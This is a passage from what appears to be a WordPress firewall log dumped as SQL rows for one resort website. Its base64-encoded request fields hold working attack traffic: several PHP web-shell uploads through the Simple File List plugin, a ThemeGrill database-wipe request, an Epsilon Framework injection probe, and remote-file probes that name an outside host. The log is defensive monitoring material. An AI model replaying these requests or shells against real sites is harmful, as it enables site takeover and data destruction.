1.2.1','{\"learningMode\":0,\"failedRules\":\"285\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZXhwY29tNS9wdWJsaWNfaHRtbC9hc2hieXJlc29ydC5jb20vd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbnRlbnQtTGVuZ3RoOiAxMjEKCmFjdGlvbj1lcHNpbG9uX2ZyYW1ld29ya19hamF4X2FjdGlvbiZhcmdzJTVCYWN0aW9uJTVEJTVCMCU1RD1lZ2RmZyZhcmdzJTVCYWN0aW9uJTVEJTVCMSU1RD1kZmdkZmcmYXJncyU1QmFyZ3MlNUQ9ZGZnZGZnZmc=\"}'),(175093,1605501122.996981,1605501122.208300,'\0\0\0\0\0\0\0\0\0\0\r',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Function Injection in Multiple Themes using Epsilon Framework <= 1.2.1','{\"learningMode\":0,\"failedRules\":\"285\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZXhwY29tNS9wdWJsaWNfaHRtbC9hc2hieXJlc29ydC5jb20vd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbnRlbnQtTGVuZ3RoOiAxMjEKCmFjdGlvbj1lcHNpbG9uX2ZyYW1ld29ya19hamF4X2FjdGlvbiZhcmdzJTVCYWN0aW9uJTVEJTVCMCU1RD1lZ2RmZyZhcmdzJTVCYWN0aW9uJTVEJTVCMSU1RD1kZmdkZmcmYXJncyU1QmFyZ3MlNUQ9ZGZnZGZnZmc=\"}'),(175094,1605340483.494424,1605340482.562900,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/i.txt','http://ashbyresort.com/i.txt','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2kudHh0\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC9pLnR4dCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL2FzaGJ5cmVzb3J0LmNvbS9pLnR4dApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NDsgcnY6NTYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83Mi4wClgtSHR0cHM6IDEKCg==\"}'),(175095,1605340480.779544,1605340480.058100,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/i.txt','http://ashbyresort.com/i.txt','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2kudHh0\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC9pLnR4dCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL2FzaGJ5cmVzb3J0LmNvbS9pLnR4dApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NDsgcnY6NTYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83Mi4wCgo=\"}'),(175096,1605340478.174862,1605340477.185500,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/?Database=i.txt&WordPress=www.traditional-instinctive-archery.com%2Fi.txt','http://ashbyresort.com/?Database=i.txt&WordPress=www.traditional-instinctive-archery.com/i.txt','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Lw==\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC8\\/RGF0YWJhc2U9aS50eHQmV29yZFByZXNzPXd3dy50cmFkaXRpb25hbC1pbnN0aW5jdGl2ZS1hcmNoZXJ5LmNvbSUyRmkudHh0IEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vYXNoYnlyZXNvcnQuY29tLz9EYXRhYmFzZT1pLnR4dCZXb3JkUHJlc3M9d3d3LnRyYWRpdGlvbmFsLWluc3RpbmN0aXZlLWFyY2hlcnkuY29tL2kudHh0ClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBydjo1Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzcyLjAKWC1IdHRwczogMQoK\"}'),(175097,1605340475.066942,1605340474.042200,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/?Database=i.txt&WordPress=www.traditional-instinctive-archery.com%2Fi.txt','http://ashbyresort.com/?Database=i.txt&WordPress=www.traditional-instinctive-archery.com/i.txt','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Lw==\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC8\\/RGF0YWJhc2U9aS50eHQmV29yZFByZXNzPXd3dy50cmFkaXRpb25hbC1pbnN0aW5jdGl2ZS1hcmNoZXJ5LmNvbSUyRmkudHh0IEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vYXNoYnlyZXNvcnQuY29tLz9EYXRhYmFzZT1pLnR4dCZXb3JkUHJlc3M9d3d3LnRyYWRpdGlvbmFsLWluc3RpbmN0aXZlLWFyY2hlcnkuY29tL2kudHh0ClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBydjo1Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzcyLjAKCg==\"}'),(175066,1604366302.915606,1604366301.959700,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/home/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L2hvbWUvd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvaG9tZS93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTVfNCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzgxLjAuNDA0NC4xMjkgU2FmYXJpLzUzNy4zNgpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PWE1MmQwYmRlYjU2MzliMmI1NDgxZTZiMGU3ZjMwNzYyCkNvbnRlbnQtTGVuZ3RoOiA5OTIKCi0tYTUyZDBiZGViNTYzOWIyYjU0ODFlNmIwZTdmMzA3NjIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9JRCIKCjEKLS1hNTJkMGJkZWI1NjM5YjJiNTQ4MWU2YjBlN2YzMDc2MgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1Rva2VuIgoKYmEyODgyNTI2MjlhNTM5OTc1OWI2ZmRlMWUyMDViYzIKLS1hNTJkMGJkZWI1NjM5YjJiNTQ4MWU2YjBlN2YzMDc2MgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0ZpbGVVcGxvYWREaXIiCgovd3AtY29udGVudC91cGxvYWRzL3NpbXBsZS1maWxlLWxpc3QvCi0tYTUyZDBiZGViNTYzOWIyYjU0ODFlNmIwZTdmMzA3NjIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9UaW1lc3RhbXAiCgoxNTg3MjU4ODg1Ci0tYTUyZDBiZGViNTYzOWIyYjU0ODFlNmIwZTdmMzA3NjIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9Imt1enRyZWFxZG4ucG5nIgpDb250ZW50LVR5cGU6IGltYWdlL3BuZwpFeHBpcmVzOiAwCgo8P3BocCBlY2hvICJNb2hhbWVkWE8tU3AzY3RyYSI7IGVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsgZWNobyAiPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4gPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J3piJz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPjwvZm9ybT4iOyBpZigkX1BPU1RbJ3VwbG9hZCddKSB7IGlmKEBjb3B5KCRfRklMRVNbJ3piJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ3piJ11bJ25hbWUnXSkpIHsgZWNobyAiZVhwbG9pdGluZyBEb25lIjsgfSBlbHNlIHsgZWNobyAiRmFpbGVkIHRvIFVwbG9hZC4iOyB9IH0gPz4KLS1hNTJkMGJkZWI1NjM5YjJiNTQ4MWU2YjBlN2YzMDc2Mi0tCg==\"}'),(175067,1604366300.806627,1604366299.718700,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/test/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3Rlc3Qvd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvdGVzdC93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTVfNCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzgxLjAuNDA0NC4xMjkgU2FmYXJpLzUzNy4zNgpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTE0ZjEzZTUyNWQ1OWM1MzQxNDk1ZjhjZDNhNGZmYzY5CkNvbnRlbnQtTGVuZ3RoOiA5OTIKCi0tMTRmMTNlNTI1ZDU5YzUzNDE0OTVmOGNkM2E0ZmZjNjkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9JRCIKCjEKLS0xNGYxM2U1MjVkNTljNTM0MTQ5NWY4Y2QzYTRmZmM2OQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1Rva2VuIgoKYmEyODgyNTI2MjlhNTM5OTc1OWI2ZmRlMWUyMDViYzIKLS0xNGYxM2U1MjVkNTljNTM0MTQ5NWY4Y2QzYTRmZmM2OQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0ZpbGVVcGxvYWREaXIiCgovd3AtY29udGVudC91cGxvYWRzL3NpbXBsZS1maWxlLWxpc3QvCi0tMTRmMTNlNTI1ZDU5YzUzNDE0OTVmOGNkM2E0ZmZjNjkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9UaW1lc3RhbXAiCgoxNTg3MjU4ODg1Ci0tMTRmMTNlNTI1ZDU5YzUzNDE0OTVmOGNkM2E0ZmZjNjkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9InlteXZ1aWFicnIucG5nIgpDb250ZW50LVR5cGU6IGltYWdlL3BuZwpFeHBpcmVzOiAwCgo8P3BocCBlY2hvICJNb2hhbWVkWE8tU3AzY3RyYSI7IGVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsgZWNobyAiPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4gPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J3piJz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPjwvZm9ybT4iOyBpZigkX1BPU1RbJ3VwbG9hZCddKSB7IGlmKEBjb3B5KCRfRklMRVNbJ3piJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ3piJ11bJ25hbWUnXSkpIHsgZWNobyAiZVhwbG9pdGluZyBEb25lIjsgfSBlbHNlIHsgZWNobyAiRmFpbGVkIHRvIFVwbG9hZC4iOyB9IH0gPz4KLS0xNGYxM2U1MjVkNTljNTM0MTQ5NWY4Y2QzYTRmZmM2OS0tCg==\"}'),(175065,1604366305.042679,1604366304.017300,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/2020/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"LzIwMjAvd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvMjAyMC93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTVfNCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzgxLjAuNDA0NC4xMjkgU2FmYXJpLzUzNy4zNgpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PWRhYmVjZGNiYTdiNzNlOWE5NmY3MTViNWY3ZTUyOWNhCkNvbnRlbnQtTGVuZ3RoOiA5OTIKCi0tZGFiZWNkY2JhN2I3M2U5YTk2ZjcxNWI1ZjdlNTI5Y2EKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9JRCIKCjEKLS1kYWJlY2RjYmE3YjczZTlhOTZmNzE1YjVmN2U1MjljYQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1Rva2VuIgoKYmEyODgyNTI2MjlhNTM5OTc1OWI2ZmRlMWUyMDViYzIKLS1kYWJlY2RjYmE3YjczZTlhOTZmNzE1YjVmN2U1MjljYQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0ZpbGVVcGxvYWREaXIiCgovd3AtY29udGVudC91cGxvYWRzL3NpbXBsZS1maWxlLWxpc3QvCi0tZGFiZWNkY2JhN2I3M2U5YTk2ZjcxNWI1ZjdlNTI5Y2EKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9UaW1lc3RhbXAiCgoxNTg3MjU4ODg1Ci0tZGFiZWNkY2JhN2I3M2U5YTk2ZjcxNWI1ZjdlNTI5Y2EKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9Imtzemp0cWh4bmUucG5nIgpDb250ZW50LVR5cGU6IGltYWdlL3BuZwpFeHBpcmVzOiAwCgo8P3BocCBlY2hvICJNb2hhbWVkWE8tU3AzY3RyYSI7IGVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsgZWNobyAiPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4gPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J3piJz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPjwvZm9ybT4iOyBpZigkX1BPU1RbJ3VwbG9hZCddKSB7IGlmKEBjb3B5KCRfRklMRVNbJ3piJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ3piJ11bJ25hbWUnXSkpIHsgZWNobyAiZVhwbG9pdGluZyBEb25lIjsgfSBlbHNlIHsgZWNobyAiRmFpbGVkIHRvIFVwbG9hZC4iOyB9IH0gPz4KLS1kYWJlY2RjYmE3YjczZTlhOTZmNzE1YjVmN2U1MjljYS0tCg==\"}'),(175061,0.000000,1604081958.876038,'\0\0\0\0\0\0\0\0\0\0E.$',0,200,0,0,0,'https://ashbyresort.com/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(175062,1604147456.276792,1604147455.104200,'\0\0\0\0\0\0\0\0\0\06\'',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php?action=anything&do_reset_wordpress=1',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','ThemeGrill Demo Importer < 1.6.2 - Auth Bypass & Database Wipe','{\"learningMode\":0,\"failedRules\":\"207\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb19yZXNldF93b3JkcHJlc3Nd\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249YW55dGhpbmcmZG9fcmVzZXRfd29yZHByZXNzPTEgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCgo=\"}'),(175063,1604147462.676691,1604147461.482900,'\0\0\0\0\0\0\0\0\0\0#Z',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php?action=anything&do_reset_wordpress=1',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','ThemeGrill Demo Importer < 1.6.2 - Auth Bypass & Database Wipe','{\"learningMode\":0,\"failedRules\":\"207\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb19yZXNldF93b3JkcHJlc3Nd\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1hZG1pbi9hZG1pbi1hamF4LnBocD9hY3Rpb249YW55dGhpbmcmZG9fcmVzZXRfd29yZHByZXNzPTEgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCgo=\"}'),(175064,1604312466.264443,1604312463.536300,'\0\0\0\0\0\0\0\0\0\0hO.',0,403,0,0,0,'http://ashbyresort.com/',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Lw==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODYuMC40MjQwLjExMSBTYWZhcmkvNTM3LjM2CkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9MTRlY2I3ZmI0MDJiNWYzYjRlNTVjYjU3NWMzN2YxZmIKQ29udGVudC1MZW5ndGg6IDExMzAKCi0tMTRlY2I3ZmI0MDJiNWYzYjRlNTVjYjU3NWMzN2YxZmIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzb2NpYWwiCgpyeHJzaGVsbAotLTE0ZWNiN2ZiNDAyYjVmM2I0ZTU1Y2I1NzVjMzdmMWZiCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idGFzayIKCnNldE5ld0ljb25TaGFyZQotLTE0ZWNiN2ZiNDAyYjVmM2I0ZTU1Y2I1NzVjMzdmMWZiCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ib3B0aW9uIgoKY29tX2FjeW0KLS0xNGVjYjdmYjQwMmI1ZjNiNGU1NWNiNTc1YzM3ZjFmYgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImN0cmwiCgpmcm9udG1haWxzCi0tMTRlY2I3ZmI0MDJiNWYzYjRlNTVjYjU3NWMzN2YxZmIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9ImxhbGFsYS5waHAiCkNvbnRlbnQtVHlwZTogdGV4dC9waHAKRXhwaXJlczogMAoKPD8gIGVjaG8gIidSeFIgSGFDa0VycyI7ICRjd2QgPSBnZXRjd2QoKTsgRWNobyAnPGNlbnRlcj4gIDxmb3JtIG1ldGhvZD0icG9zdCIgdGFyZ2V0PSJfc2VsZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICA8aW5wdXQgdHlwZT0iZmlsZSIgc2l6ZT0iMjAiIG5hbWU9InVwbG9hZHMiIC8+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJ1cGxvYWQiIC8+ICA8L2Zvcm0+ICA8L2NlbnRlcj48L3RkPjwvdHI+IDwvdGFibGU+PGJyPic7IGlmICghZW1wdHkgKCRfRklMRVNbJ3VwbG9hZHMnXSkpIHsgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyd1cGxvYWRzJ11bJ3RtcF9uYW1lJ10sJF9GSUxFU1sndXBsb2FkcyddWyduYW1lJ10pOyAgICAgRWNobyAiPHNjcmlwdD5hbGVydCgndXBsb2FkIERvbmUnKTsgCSAJIDwvc2NyaXB0PjxiPlVwbG9hZGVkICEhITwvYj48YnI+bmFtZSA6ICIuJF9GSUxFU1sndXBsb2FkcyddWyduYW1lJ10uIjxicj5zaXplIDogIi4kX0ZJTEVTWyd1cGxvYWRzJ11bJ3NpemUnXS4iPGJyPnR5cGUgOiAiLiRfRklMRVNbJ3VwbG9hZHMnXVsndHlwZSddOyB9ICAgPz4KLS0xNGVjYjdmYjQwMmI1ZjNiNGU1NWNiNTc1YzM3ZjFmYi0tCg==\"}'),(175024,1601909556.797621,1601909555.905800,'\0\0\0\0\0\0\0\0\0\0Ԡ',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File 